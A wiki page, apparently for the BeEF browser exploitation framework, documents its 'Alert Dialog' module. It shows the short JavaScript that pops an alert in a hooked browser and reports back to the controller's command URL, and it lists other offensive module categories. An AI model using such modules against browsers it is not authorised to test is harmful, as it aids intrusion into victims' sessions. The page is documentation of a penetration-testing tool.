-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: Alert Dialog
Jess Williams edited this page Dec 31, 2019
·
3 revisions
- Objective: Sends an alert dialog to the hooked browser.
- Date: ???
- Authors: wade, bm
- Browsers: All
- Code
Really basic, here is the whole code :
beef.execute(function() {
alert("<%== format_multiline(@text) %>");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "text=<%== format_multiline(@text) %>");
});
- So basic, that it should work on any browser any version.
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK